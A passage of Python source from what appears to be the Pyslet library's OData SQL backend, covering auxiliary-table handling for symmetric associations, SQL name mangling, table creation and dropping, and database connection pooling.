The name of the auxiliary table is obtained from the name mangler
using the association set's name. The keys use a more complex
mangled form to cover cases where there is a recursive Many to Many
relation (such as a social network of friends between User
entities). The names of the keys are obtained by mangling::
( association set name, target entity set name,
navigation property name, key name )
An example should help. Suppose we have entities representing
sports Teams(TeamID) and sports Players(PlayerID) and that you can
navigate from Player to Team using the "PlayedFor" navigation
property and from Team to Player using the "Players" navigation
property. Both navigation properties are collections so the
relationship is Many to Many. If the association set that binds the
two entity sets is called PlayersAndTeams then the the auxiliary
table name will be mangled from::
('PlayersAndTeams')
and the fields will be mangled from::
('PlayersAndTeams','Teams','PlayedFor','TeamID')
('PlayersAndTeams','Players','Players','PlayerID')
By default this results in column names 'Teams_PlayedFor_TeamID' and
'Players_Players_PlayerID'. If you are modelling an existing
database then 'TeamID' and 'PlayerID' on their own are more likely
choices. You would need to override the
:py:meth:`SQLEntityContainer.mangle_name` method in the container to
catch these cases and return the shorter column names.
Finally, to ensure the uniqueness of foreign key constraints, the
following names are mangled::
( association set name, association set name, 'fkA')
( association set name, association set name, 'fkB')
Notice that the association set name is used twice as it is not only
defines the scope of the name but must also be incorporated into the
constraint name to ensure uniqueness across the entire databas."""
def __init__(self, **kwargs):
super(SQLAssociationCollection, self).__init__(**kwargs)
# The relation is actually stored in an extra table so we will
# need a join for all operations.
self.aset_name = self.from_end.parent.name
self.atable_name = self.container.mangled_names[
(self.aset_name,)]
entitySetA, nameA, entitySetB, nameB, self.uniqueKeys = \
self.container.aux_table[self.aset_name]
if self.from_entity.entity_set is entitySetA and self.name == nameA:
self.from_nav_name = nameA
self.toNavName = nameB
else:
self.from_nav_name = nameB
self.toNavName = nameA
def reset_joins(self):
"""Overridden to provide an inner join to the aux table.
If the Customer and Group entities are related with a Many-Many
relationship called Customers_Groups, the resulting join looks
something like this (when the from_entity is a Customer)::
SELECT ... FROM Groups
INNER JOIN Customers_Groups ON
Groups.GroupID = Customers_Groups.Groups_MemberOf_GroupID
...
WHERE Customers_Groups.Customers_Members_CustomerID = ?;
The value of the CustomerID key property in from_entity is
passed as a parameter when executing the expression."""
super(SQLAssociationCollection, self).reset_joins()
join = []
for key_name in self.entity_set.keys:
join.append(
'%s.%s=%s.%s' %
(self.table_name,
self.container.mangled_names[(self.entity_set.name,
key_name)],
self.atable_name,
self.container.mangled_names[(self.aset_name,
self.entity_set.name,
self.toNavName, key_name)]))
join = ' INNER JOIN %s ON ' % self.atable_name + ' AND '.join(join)
self._aliases.add(self.atable_name)
self._joins[''] = ('', join)
def add_join(self, name):
"""Overridden to provide special handling of navigation
In most cases, there will be a navigation property bound to this
association in the reverse direction. For Many-Many relations
this can't be used in an expression but if the relationship
is actually 1-1 then we would augment the default INNER JOIN
with an additional INNER JOIN to include the whole of the
from_entity. (Normally we'd think of these expressions as LEFT
joins but we're navigating back across a link that points to a
single entity so there is no difference.)
To illustrate, if Customers have a 1-1 relationship with
PrimaryContacts through a Customers_PrimaryContacts association
set then the expression grows an additional join::
SELECT ... FROM PrimaryContacts
INNER JOIN Customers_PrimaryContacts ON
PrimaryContacts.ContactID =
Customers_PrimaryContacts.PrimaryContacts_Contact_ContactID
INNER JOIN Customers AS nav1 ON
Customers_PrimaryContacts.Customers_Customer_CustmerID =
Customers.CustomerID
...
WHERE Customers_PrimaryContacts.Customers_Customer_CustomerID = ?;
This is a cumbersome query to join two entities that are
supposed to have a 1-1 relationship, which is one of the reasons
why it is generally better to pick on side of the relationship
or other and make it 0..1 to 1 as this would obviate the
auxiliary table completely and just put a non-NULL, unique
foreign key in the table that represents the 0..1 side of the
relationship."""
if not self._joins:
self.reset_joins()
if name != self.entity_set.linkEnds[self.from_end.otherEnd]:
return super(SQLAssociationCollection, self).add_join(name)
# special handling here
if name in self._joins:
return self._joins[name][0]
# this collection is either 1-1 or Many-Many
src_multiplicity, dst_multiplicity = \
self.entity_set.get_multiplicity(name)
if dst_multiplicity != edm.Multiplicity.One:
# we can't join on this navigation property
raise NotImplementedError(
"NavigationProperty %s.%s cannot be used in an expression" %
(self.entity_set.name, name))
alias = self.next_alias()
target_set = self.from_entity.entity_set
target_table_name = self.container.mangled_names[(target_set.name, )]
join = []
for key_name in target_set.keys:
join.append(
'%s.%s=%s.%s' %
(self.atable_name,
self.container.mangled_names[(self.aset_name, target_set.name,
self.from_nav_name, key_name)],
alias,
self.container.mangled_names[(target_set.name, key_name)]))
join = ' INNER JOIN %s AS %s ON %s' % (
target_table_name, alias, ' AND '.join(join))
self._joins[name] = (alias, join)
self._aliases.add(alias)
return alias
def where_clause(self, entity, params, use_filter=True, use_skip=False):
"""Provides the *from_entity* constraint in the auxiliary table."""
where = []
for k, v in dict_items(self.from_entity.key_dict()):
where.append(
"%s.%s=%s" %
(self.atable_name,
self.container.mangled_names[
(self.aset_name,
self.from_entity.entity_set.name,
self.from_nav_name,
k)],
params.add_param(
self.container.prepare_sql_value(v))))
if entity is not None:
for k, v in dict_items(entity.key_dict()):
where.append(
"%s.%s=%s" %
(self.atable_name,
self.container.mangled_names[
(self.aset_name,
entity.entity_set.name,
self.toNavName,
k)],
params.add_param(
self.container.prepare_sql_value(v))))
if use_filter and self.filter is not None:
where.append("(%s)" % self.sql_expression(self.filter, params))
if self.skiptoken is not None and use_skip:
self.where_skiptoken_clause(where, params)
return ' WHERE ' + ' AND '.join(where)
def insert_entity(self, entity):
"""Rerouted to a SQL-specific implementation"""
self.insert_entity_sql(entity, transaction=None)
def insert_entity_sql(self, entity, transaction=None):
"""Inserts *entity* into the base collection and creates the link.
This is always done in two steps, bound together in a single
transaction (where supported). If this object represents a 1 to
1 relationship then, briefly, we'll be in violation of the
model. This will only be an issue in non-transactional
systems."""
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
with self.entity_set.open() as baseCollection:
# if this is a 1-1 relationship insert_entity_sql will
# fail (with an unbound navigation property) so we need
# to suppress the back-link.
baseCollection.insert_entity_sql(
entity, self.from_end.otherEnd, transaction=transaction)
self.insert_link(entity, transaction)
transaction.commit()
except self.container.dbapi.IntegrityError as e:
transaction.rollback(e, swallow=True)
raise edm.NavigationError(str(entity.get_location()))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def insert_link(self, entity, transaction=None):
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
query = ['INSERT INTO ', self.atable_name, ' (']
params = self.container.ParamsClass()
value_names = []
values = []
for k, v in dict_items(self.from_entity.key_dict()):
value_names.append(
self.container.mangled_names[
(self.aset_name,
self.from_entity.entity_set.name,
self.from_nav_name,
k)])
values.append(
params.add_param(
self.container.prepare_sql_value(v)))
for k, v in dict_items(entity.key_dict()):
value_names.append(
self.container.mangled_names[
(self.aset_name,
self.entity_set.name,
self.toNavName,
k)])
values.append(
params.add_param(
self.container.prepare_sql_value(v)))
query.append(', '.join(value_names))
query.append(') VALUES (')
query.append(', '.join(values))
query.append(')')
query = ''.join(query)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
transaction.commit()
except self.container.dbapi.IntegrityError as e:
transaction.rollback(e, swallow=True)
raise edm.NavigationError(
"Model integrity error when linking %s and %s" %
(str(
self.from_entity.get_location()), str(
entity.get_location())))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def replace_link(self, entity, transaction=None):
if self.from_entity[self.from_nav_name].isCollection:
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
self.clear_links(transaction)
self.insert_link(entity, transaction)
transaction.commit()
except self.container.dbapi.IntegrityError as e:
transaction.rollback(e, swallow=True)
raise edm.NavigationError(
"Model integrity error when linking %s and %s" %
(str(
self.from_entity.get_location()), str(
entity.get_location())))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
else:
# We don't support symmetric associations of the 0..1 - 0..1
# variety so this must be a 1..1 relationship.
raise edm.NavigationError(
"replace not allowed for 1-1 relationship "
"(implicit delete not supported)")
def __delitem__(self, key):
# Before we remove a link we need to know if this is 1-1
# relationship, if so, this deletion will result in a
# constraint violation.
if self.uniqueKeys:
raise edm.NavigationError("Can't remove a required link")
with self.entity_set.open() as targetCollection:
entity = targetCollection.new_entity()
entity.set_key(key)
self.delete_link(entity)
def delete_link(self, entity, transaction=None):
"""Called during cascaded deletes to force-remove a link prior
to the deletion of the entity itself.
This method is also re-used for simple deletion of the link in
this case as the link is in the auxiliary table itself."""
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
query = ['DELETE FROM ', self.atable_name]
params = self.container.ParamsClass()
# we suppress the filter check on the where clause
query.append(self.where_clause(entity, params, False))
query = ''.join(query)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
if transaction.cursor.rowcount == 0:
# no rows matched this constraint must be a key failure at one
# of the two ends
raise KeyError(
"One of the entities %s or %s no longer exists" %
(str(
self.from_entity.get_location()), str(
entity.get_location())))
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def clear_links(self, transaction=None):
"""Deletes all links from this collection's *from_entity*
transaction
An optional transaction. If present, the connection is left
uncommitted."""
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
query = ['DELETE FROM ', self.atable_name]
params = self.container.ParamsClass()
# we suppress the filter check on the where clause
query.append(self.where_clause(None, params, False))
query = ''.join(query)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
@classmethod
def clear_links_unbound(
cls,
container,
from_end,
from_entity,
transaction):
"""Special class method for deleting all the links from *from_entity*
This is a class method because it has to work even if there is
no navigation property bound to this end of the association.
container
The :py:class:`SQLEntityContainer` containing this
association set.
from_end
The :py:class:`~pyslet.odata2.csdl.AssociationSetEnd`
that represents the end of the association that
*from_entity* is bound to.
from_entity
The entity to delete links from
transaction
The current transaction (required)
This is a class method because it has to work even if there is
no navigation property bound to this end of the association. If
there was a navigation property then an instance could be
created and the simpler :py:meth:`clear_links` method used."""
aset_name = from_end.parent.name
atable_name = container.mangled_names[(aset_name,)]
nav_name = from_entity.entity_set.linkEnds[from_end]
if nav_name is None:
# this is most likely the case, we're being called this way
# because we can't instantiate a collection on an unbound
# navigation property
nav_name = ""
entitySetA, nameA, entitySetB, nameB, uniqueKeys = container.aux_table[
aset_name]
if from_entity.entity_set is entitySetA and nav_name == nameA:
from_nav_name = nameA
else:
from_nav_name = nameB
query = ['DELETE FROM ', atable_name]
params = container.ParamsClass()
query.append(' WHERE ')
where = []
for k, v in dict_items(from_entity.key_dict()):
where.append(
"%s.%s=%s" %
(atable_name,
container.mangled_names[
(aset_name,
from_entity.entity_set.name,
from_nav_name,
k)],
params.add_param(
container.prepare_sql_value(v))))
query.append(' AND '.join(where))
query = ''.join(query)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
@classmethod
def create_table_query(cls, container, aset_name):
"""Returns a SQL statement and params to create the auxiliary table.
This is a class method to enable the table to be created before
any entities are created."""
entitySetA, nameA, entitySetB, nameB, uniqueKeys = container.aux_table[
aset_name]
query = ['CREATE TABLE ', container.mangled_names[(aset_name,)], ' (']
params = container.ParamsClass()
cols = []
constraints = []
pk_names = []
for es, prefix, ab in ((entitySetA, nameA, 'A'),
(entitySetB, nameB, 'B')):
target_table = container.mangled_names[(es.name,)]
fk_names = []
k_names = []
for key_name in es.keys:
# create a dummy value to catch the unusual case where
# there is a default
v = es.entityType[key_name]()
cname = container.mangled_names[
(aset_name, es.name, prefix, key_name)]
fk_names.append(cname)
pk_names.append(cname)
k_names.append(container.mangled_names[(es.name, key_name)])
cols.append("%s %s" %
(cname, container.prepare_sql_type(v, params)))
constraints.append(
"CONSTRAINT %s FOREIGN KEY (%s) REFERENCES %s(%s)" %
(container.mangled_names[(aset_name, aset_name, "fk" + ab)],
', '.join(fk_names),
target_table, ', '.join(k_names)))
if uniqueKeys:
constraints.append("CONSTRAINT %s UNIQUE (%s)" % (
container.quote_identifier("u" + ab),
', '.join(fk_names)))
# Finally, add a unique constraint spanning all columns as we don't
# want duplicate relations
constraints.append("CONSTRAINT %s UNIQUE (%s)" % (
container.mangled_names[(aset_name, aset_name, "pk")],
', '.join(pk_names)))
cols = cols + constraints
query.append(", ".join(cols))
query.append(')')
return ''.join(query), params
@classmethod
def create_table(cls, container, aset_name):
"""Executes the SQL statement :py:meth:`create_table_query`"""
connection = container.acquire_connection(
SQL_TIMEOUT) #: a connection to the database
if connection is None:
raise DatabaseBusy(
"Failed to acquire connection after %is" % SQL_TIMEOUT)
transaction = SQLTransaction(container, connection)
try:
transaction.begin()
query, params = cls.create_table_query(container, aset_name)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
if connection is not None:
container.release_connection(connection)
@classmethod
def drop_table_query(cls, container, aset_name):
"""Returns a SQL statement to drop the auxiliary table."""
entitySetA, nameA, entitySetB, nameB, uniqueKeys = container.aux_table[
aset_name]
query = ['DROP TABLE ', container.mangled_names[(aset_name,)]]
return ''.join(query)
@classmethod
def drop_table(cls, container, aset_name):
"""Executes the SQL statement :py:meth:`drop_table_query`"""
connection = container.acquire_connection(
SQL_TIMEOUT) #: a connection to the database
if connection is None:
raise DatabaseBusy(
"Failed to acquire connection after %is" % SQL_TIMEOUT)
transaction = SQLTransaction(container, connection)
try:
transaction.begin()
query = cls.drop_table_query(container, aset_name)
logging.info("%s;", query)
transaction.execute(query)
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
if connection is not None:
container.release_connection(connection)
class DummyLock(object):
"""An object to use in place of a real Lock, can always be acquired"""
def acquire(self, blocking=None):
return True
def release(self):
pass
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
pass
class SQLConnection(object):
"""An object used to wrap the connection.
Used in the connection pools to keep track of which thread owns the
connections, the depth of the lock and when the connection was last
modified (acquired or released)."""
def __init__(self):
self.thread = None
self.thread_id = None
self.locked = 0
self.last_seen = 0
self.dbc = None
class SQLEntityContainer(object):
"""Object used to represent an Entity Container (aka Database).
Keyword arguments on construction:
container
The :py:class:`~pyslet.odata2.csdl.EntityContainer` that defines
this database.
streamstore
An optional :py:class:`~pyslet.blockstore.StreamStore` that will
be used to store media resources in the container. If absent,
media resources actions will generate NotImplementedError.
dbapi
The DB API v2 compatible module to use to connect to the
database.
This implementation is compatible with modules regardless of
their thread-safety level (provided they declare it
correctly!).
max_connections (optional)
The maximum number of connections to open to the database.
If your program attempts to open more than this number
(defaults to 10) then it will block until a connection
becomes free. Connections are always shared within the same
thread so this argument should be set to the expected
maximum number of threads that will access the database.
If using a module with thread-safety level 0 max_connections
is ignored and is effectively 1, so use of the API is then
best confined to single-threaded programs. Multi-threaded
programs can still use the API but it will block when there
is contention for access to the module and context switches
will force the database connection to be closed and reopened.
field_name_joiner (optional)
The character used by the name mangler to join compound
names, for example, to obtain the column name of a complex
property like "Address/City". The default is "_", resulting
in names like "Address_City" but it can be changed here.
Note: all names are quoted using :py:meth:`quote_identifier`
before appearing in SQL statements.
max_idle (optional)
The maximum number of seconds idle database connections should
be kept open before they are cleaned by the
:meth:`pool_cleaner`. The default is None which means that the
pool_cleaner never runs. Any other value causes a separate
thread to be created to run the pool cleaner passing the value
of the parameter each time. The frequency of calling the
pool_cleaner method is calculated by dividing max_idle by 5, but
it never runs more than once per minute. For example, a setting
of 3600 (1 hour) will result in a pool cleaner call every 12
minutes.
This class is designed to work with diamond inheritance and super.
All derived classes must call __init__ through super and pass all
unused keyword arguments. For example::
class MyDBContainer:
def __init__(self,myDBConfig,**kwargs):
super(MyDBContainer,self).__init__(**kwargs)
# do something with myDBConfig...."""
def __init__(self, container, dbapi, streamstore=None, max_connections=10,
field_name_joiner="_", max_idle=None, **kwargs):
if kwargs:
logging.debug(
"Unabsorbed kwargs in SQLEntityContainer constructor")
self.container = container
#: the :py:class:`~pyslet.odata2.csdl.EntityContainer`
self.streamstore = streamstore
#: the optional :py:class:`~pyslet.blockstore.StreamStore`
self.dbapi = dbapi
#: the DB API compatible module
self.module_lock = None
if self.dbapi.threadsafety == 0:
# we can't even share the module, so just use one connection will
# do
self.module_lock = threading.RLock()
self.clocker = DummyLock
self.cpool_max = 1
else:
# Level 1 and above we can share the module
self.module_lock = DummyLock()
self.clocker = threading.RLock
self.cpool_max = max_connections
self.cpool_lock = threading.Condition()
self.cpool_locked = {}
self.cpool_unlocked = {}
self.cpool_idle = []
self.cpool_size = 0
self.closing = threading.Event()
# set up the parameter style
if self.dbapi.paramstyle == "qmark":
self.ParamsClass = QMarkParams
elif self.dbapi.paramstyle == "numeric":
self.ParamsClass = NumericParams
elif self.dbapi.paramstyle == "named":
self.ParamsClass = NamedParams
elif self.dbapi.paramstyle == "format":
self.ParamsClass = FormatParams
else:
# will fail later when we try and add parameters
logging.warn("Unsupported DBAPI params style: %s\n"
"setting to qmark",
self.dbapi.paramstyle)
self.ParamsClass = SQLParams
self.fk_table = {}
"""A mapping from an entity set name to a FK mapping of the form::
{<association set end>: (<nullable flag>, <unique keys flag>),...}
The outer mapping has one entry for each entity set (even if the
corresponding foreign key mapping is empty).
Each foreign key mapping has one entry for each foreign key
reference that must appear in that entity set's table. The key
is an :py:class:`AssociationSetEnd` that is bound to the entity
set (the other end will be bound to the target entity set).
This allows us to distinguish between the two ends of a
recursive association."""
self.aux_table = {}
"""A mapping from the names of symmetric association sets to a
tuple of::
(<entity set A>, <name prefix A>, <entity set B>,
<name prefix B>, <unique keys>)"""
self.mangled_names = {}
"""A mapping from source path tuples to mangled and quoted names
to use in SQL queries. For example::
('Customer'):'"Customer"'
('Customer', 'Address', 'City') : "Address_City"
('Customer', 'Orders') : "Customer_Orders"
Note that the first element of the tuple is the entity set name
but the default implementation does not use this in the mangled
name for primitive fields as they are qualified in contexts
where a name clash is possible. However, mangled navigation
property names do include the table name prefix as they used as
pseudo-table names."""
self.field_name_joiner = field_name_joiner
"""Default string used to join complex field names in SQL
queries, e.g. Address_City"""
self.ro_names = set()
"""The set of names that should be considered read only by the
SQL insert and update generation code. The items in the set are
source paths, as per :py:attr:`mangled_names`. The set is
populated on construction using the :py:meth:`ro_name` method."""
# for each entity set in this container, bind a SQLEntityCollection
# object
for es in self.container.EntitySet:
self.fk_table[es.name] = {}
for source_path in self.source_path_generator(es):
self.mangled_names[source_path] = self.mangle_name(source_path)
if self.ro_name(source_path):
self.ro_names.add(source_path)
self.bind_entity_set(es)
for es in self.container.EntitySet:
for np in es.entityType.NavigationProperty:
self.bind_navigation_property(es, np.name)
# once the navigation properties have been bound, fk_table will
# have been populated with any foreign keys we need to add field
# name mappings for
for esName, fk_mapping in dict_items(self.fk_table):
for link_end, details in dict_items(fk_mapping):
aset_name = link_end.parent.name
target_set = link_end.otherEnd.entity_set
for key_name in target_set.keys:
"""Foreign keys are given fake source paths starting
with the association set name::
( "Orders_Customers", "CustomerID" )"""
source_path = (esName, aset_name, key_name)
self.mangled_names[source_path] = \
self.mangle_name(source_path)
# and aux_table will have been populated with additional tables to
# hold symmetric associations...
for aSet in self.container.AssociationSet:
if aSet.name not in self.aux_table:
continue
self.mangled_names[(aSet.name,)] = self.mangle_name((aSet.name,))
"""Foreign keys in Tables that model association sets are
given fake source paths that combine the entity set name and
the name of the navigation property endpoint.
This ensures the special case where the two entity sets are
the same is taken care of (as the navigation property
endpoints must still be unique). For one-way associations,
prefixB will be an empty string."""
esA, prefixA, esB, prefixB, unique = self.aux_table[aSet.name]
for key_name in esA.keys:
source_path = (aSet.name, esA.name, prefixA, key_name)
self.mangled_names[source_path] = self.mangle_name(source_path)
for key_name in esB.keys:
source_path = (aSet.name, esB.name, prefixB, key_name)
self.mangled_names[source_path] = self.mangle_name(source_path)
"""And mangle the foreign key constraint names..."""
for kc in ('fkA', 'fkB', "pk"):
source_path = (aSet.name, aSet.name, kc)
self.mangled_names[source_path] = self.mangle_name(source_path)
# start the pool cleaner thread if required
if max_idle is not None:
t = threading.Thread(
target=self._run_pool_cleaner, kwargs={'max_idle': max_idle})
t.setDaemon(True)
t.start()
logging.info("Starting pool_cleaner with max_idle=%f" %
float(max_idle))
def mangle_name(self, source_path):
"""Mangles a source path into a quoted SQL name
This is a key extension point to use when you are wrapping an existing
database with the API. It allows you to control the names used for
entity sets (tables) and properties (columns) in SQL queries.
source_path
A tuple or list of strings describing the path to a property
in the metadata model.
For entity sets, this is a tuple with a single entry in it,
the entity set name.
For data properties this is a tuple containing the path,
including the entity set name e.g.,
("Customers","Address","City") for the City property in a
complex property 'Address' in entity set "Customers".
For navigation properties the tuple is the navigation
property name prefixed with the entity set name, e.g.,
("Customers","Orders"). This name is only used as a SQL
alias for the target table, to remove ambiguity from certain
queries that include a join across the navigation property.
The mangled name must be distinct from the entity set name
itself. from other such aliases and from other column names
in this table.
Foreign key properties contain paths starting with both the
entity set and the association set names (see
:py:class:`SQLForeignKeyCollection` for details) unless the
association is symmetric, in which case they also contain
the navigation property name (see
:py:class:`SQLAssociationCollection` for details of these
more complex cases).
The default implementation strips the entity set name away and
uses the default joining character to create a compound name
before calling
:py:meth:`quote_identifier` to obtain the SQL string. All names
are mangled once, on construction, and from then on looked up in
the dictionary of mangled names.
If you need to override this method to modify the names used in
your database you should ensure all other names (including any
unrecognized by your program) are passed to the default
implementation for mangling."""
if len(source_path) > 1:
source_path = list(source_path)[1:]
return self.quote_identifier(
self.field_name_joiner.join(source_path))
def ro_name(self, source_path):
"""Test if a source_path identifies a read-only property
This is a an additional extension point to use when you are
wrapping an existing database with the API. It allows you to
manage situations where an entity property has an implied
value and should be treated read only.
There are two key use cases, auto-generated primary keys (such
as auto-increment integer keys) and foreign keys which are
exposed explicitly as foreign keys and should only be updated
through an associated navigation property.
source_path
A tuple or list of strings describing the path to a property
in the metadata model. See :py:meth:`mangle_name` for more
information.
The default implementation returns False.
If you override this method you must ensure all other names
(including any unrecognized by your program) are passed to the
default implementation using super."""
return False
def source_path_generator(self, entity_set):
"""Utility generator for source path *tuples* for *entity_set*"""
yield (entity_set.name,)
for source_path in self.type_name_generator(entity_set.entityType):
yield tuple([entity_set.name] + source_path)
if entity_set.entityType.has_stream():
yield (entity_set.name, '_value')
for link_end, nav_name in dict_items(entity_set.linkEnds):
if not nav_name:
# use the role name of the other end of the link instead
# this makes sense because if entity_set is 'Orders' and
# is linked to 'Customers' but lacks a navigation
# property then the role name for link_end is likely to
# be something like 'Order' and the other end is likely
# to be something like 'Customer' - which provides a
# reasonable guess at what the navigation property might
# have been called and, furthermore, is under the
# control of the model designer without directly
# affecting the entities themselves.
yield (entity_set.name, link_end.otherEnd.name)
else:
yield (entity_set.name, nav_name)
def type_name_generator(self, type_def):
for p in type_def.Property:
if p.complexType is not None:
for subPath in self.type_name_generator(p.complexType):
yield [p.name] + subPath
else:
yield [p.name]
def bind_entity_set(self, entity_set):
entity_set.bind(self.get_collection_class(), container=self)
def bind_navigation_property(self, entity_set, name):
# Start by making a tuple of the end multiplicities.
from_as_end = entity_set.navigation[name]
to_as_end = from_as_end.otherEnd
# extract the name of the association set
aset_name = from_as_end.parent.name
target_set = to_as_end.entity_set
multiplicity = (
from_as_end.associationEnd.multiplicity,
to_as_end.associationEnd.multiplicity)
# now we can work on a case-by-case basis, note that fk_table may
# be filled in twice for the same association (if navigation
# properties are defined in both directions) but this is benign
# because the definition should be identical.
if multiplicity in (
(edm.Multiplicity.One, edm.Multiplicity.One),
(edm.Multiplicity.ZeroToOne, edm.Multiplicity.ZeroToOne)):
entity_set.bind_navigation(
name,
self.get_symmetric_navigation_class(),
container=self,
aset_name=aset_name)
if aset_name in self.aux_table:
# This is the navigation property going back the other
# way, set the navigation name only
self.aux_table[aset_name][3] = name
else:
self.aux_table[aset_name] = [
entity_set, name, target_set, "", True]
elif multiplicity == (edm.Multiplicity.Many, edm.Multiplicity.Many):
entity_set.bind_navigation(
name,
self.get_symmetric_navigation_class(),
container=self,
aset_name=aset_name)
if aset_name in self.aux_table:
self.aux_table[aset_name][3] = name
else:
self.aux_table[aset_name] = [
entity_set, name, target_set, "", False]
elif (multiplicity ==
(edm.Multiplicity.One, edm.Multiplicity.ZeroToOne)):
entity_set.bind_navigation(name,
self.get_rk_class(),
container=self, aset_name=aset_name)
self.fk_table[target_set.name][to_as_end] = (False, True)
elif multiplicity == (edm.Multiplicity.One, edm.Multiplicity.Many):
entity_set.bind_navigation(name,
self.get_rk_class(),
container=self, aset_name=aset_name)
self.fk_table[target_set.name][to_as_end] = (False, False)
elif (multiplicity ==
(edm.Multiplicity.ZeroToOne, edm.Multiplicity.Many)):
entity_set.bind_navigation(
name,
self.get_rk_class(),
container=self,
aset_name=aset_name)
self.fk_table[target_set.name][to_as_end] = (True, False)
elif (multiplicity ==
(edm.Multiplicity.ZeroToOne, edm.Multiplicity.One)):
entity_set.bind_navigation(
name,
self.get_fk_class(),
container=self,
aset_name=aset_name)
self.fk_table[entity_set.name][from_as_end] = (False, True)
elif multiplicity == (edm.Multiplicity.Many, edm.Multiplicity.One):
entity_set.bind_navigation(
name,
self.get_fk_class(),
container=self,
aset_name=aset_name)
self.fk_table[entity_set.name][from_as_end] = (False, False)
else:
# (edm.Multiplicity.Many,edm.Multiplicity.ZeroToOne)
entity_set.bind_navigation(name, self.get_fk_class(
), container=self, aset_name=aset_name)
self.fk_table[entity_set.name][from_as_end] = (True, False)
def get_collection_class(self):
"""Returns the collection class used to represent a generic entity set.
Override this method to provide a class derived from
:py:class:`SQLEntityCollection` when you are customising this
implementation for a specific database engine."""
return SQLEntityCollection
def get_symmetric_navigation_class(self):
"""Returns the collection class used to represent a symmetric relation.
Override this method to provide a class derived from
:py:class:`SQLAssociationCollection` when you are customising this
implementation for a specific database engine."""
return SQLAssociationCollection
def get_fk_class(self):
"""Returns the class used when the FK is in the source table.
Override this method to provide a class derived from
:py:class:`SQLForeignKeyCollection` when you are customising this
implementation for a specific database engine."""
return SQLForeignKeyCollection
def get_rk_class(self):
"""Returns the class used when the FK is in the target table.
Override this method to provide a class derived from
:py:class:`SQLReverseKeyCollection` when you are customising this
implementation for a specific database engine."""
return SQLReverseKeyCollection
def create_all_tables(self, out=None):
"""Creates all tables in this container.
out
An optional file-like object. If given, the tables are not
actually created, the SQL statements are written to this
file instead.
Tables are created in a sensible order to ensure that foreign
key constraints do not fail but this method is not compatible
with databases that contain circular references though, e.g.,
Table A -> Table B with a foreign key and Table B -> Table A
with a foreign key. Such databases will have to be created by
hand. You can use the create_table_query methods to act as a
starting point for your script."""
visited = set()
create_list = []
for es in self.container.EntitySet:
if es.name not in visited:
self.create_table_list(es, visited, create_list)
for es in create_list:
with es.open() as collection:
if out is None:
collection.create_table()
else:
query, params = collection.create_table_query()
out.write(query)
out.write(";\n\n")
if params.params:
logging.warning("Ignoring params to CREATE TABLE: %s",
to_text(params.params))
# we now need to go through the aux_table and create them
for aset_name in self.aux_table:
nav_class = self.get_symmetric_navigation_class()
if out is None:
nav_class.create_table(self, aset_name)
else:
query, params = nav_class.create_table_query(self, aset_name)
out.write(query)
out.write(";\n\n")
if params.params:
logging.warning("Ignoring params to CREATE TABLE: %s",
to_text(params.params))
def CreateAllTables(self): # noqa
warnings.warn("SQLEntityContainer.CreateAllTables is deprecated, "
"use create_all_tables",
DeprecationWarning,
stacklevel=3)
return self.create_all_tables()
def create_table(self, es, visited):
# before we create this table, we need to check to see if it
# references another table
visited.add(es.name)
fk_mapping = self.fk_table[es.name]
for link_end, details in dict_items(fk_mapping):
target_set = link_end.otherEnd.entity_set
if target_set.name in visited:
# prevent recursion
continue
self.create_table(target_set, visited)
# now we are free to create the table
with es.open() as collection:
collection.create_table()
def create_table_list(self, es, visited, create_list):
# before we create this table, we need to check to see if it
# references another table
visited.add(es.name)
fk_mapping = self.fk_table[es.name]
for link_end, details in dict_items(fk_mapping):
target_set = link_end.otherEnd.entity_set
if target_set.name in visited:
# prevent infinite recursion
continue
self.create_table_list(target_set, visited, create_list)
# now we are free to create the table
create_list.append(es)
def drop_all_tables(self, out=None):
"""Drops all tables in this container.
Tables are dropped in a sensible order to ensure that foreign
key constraints do not fail, the order is essentially the
reverse of the order used by :py:meth:`create_all_tables`."""
# first we need to go through the aux_table and drop them
for aset_name in self.aux_table:
nav_class = self.get_symmetric_navigation_class()
if out is None:
try:
nav_class.drop_table(self, aset_name)
except SQLError as e:
logging.warn("Ignoring : %s", str(e))
else:
query = nav_class.drop_table_query(self, aset_name)
out.write(query)
out.write(";\n\n")
visited = set()
drop_list = []
for es in self.container.EntitySet:
if es.name not in visited:
self.create_table_list(es, visited, drop_list)
drop_list.reverse()
for es in drop_list:
with es.open() as collection:
if out is None:
try:
collection.drop_table()
except SQLError as e:
logging.warn("Ignoring : %s", str(e))
else:
query = collection.drop_table_query()
out.write(query)
out.write(";\n\n")
def acquire_connection(self, timeout=None):
# block on the module for threadsafety==0 case
thread = threading.current_thread()
thread_id = thread.ident
now = start = time.time()
cpool_item = None
close_flag = False
with self.cpool_lock:
if self.closing.is_set():
# don't open connections when we are trying to close them
return None
while not self.module_lock.acquire(False):
self.cpool_lock.wait(timeout)
now = time.time()
if timeout is not None and now > start + timeout:
logging.warn(
"Thread[%i] timed out waiting for the the database "
"module lock", thread_id)
return None
# we have the module lock
cpool_item = self.cpool_locked.get(thread_id, None)
if cpool_item:
# our thread_id is in the locked table
cpool_item.locked += 1
cpool_item.last_seen = now
while cpool_item is None:
if thread_id in self.cpool_unlocked:
# take the connection that last belonged to us
cpool_item = self.cpool_unlocked[thread_id]
del self.cpool_unlocked[thread_id]
logging.debug("Thread[%i] re-acquiring connection",
thread_id)
elif (self.cpool_idle):
# take a connection from an expired thread
cpool_item = self.cpool_idle.pop()
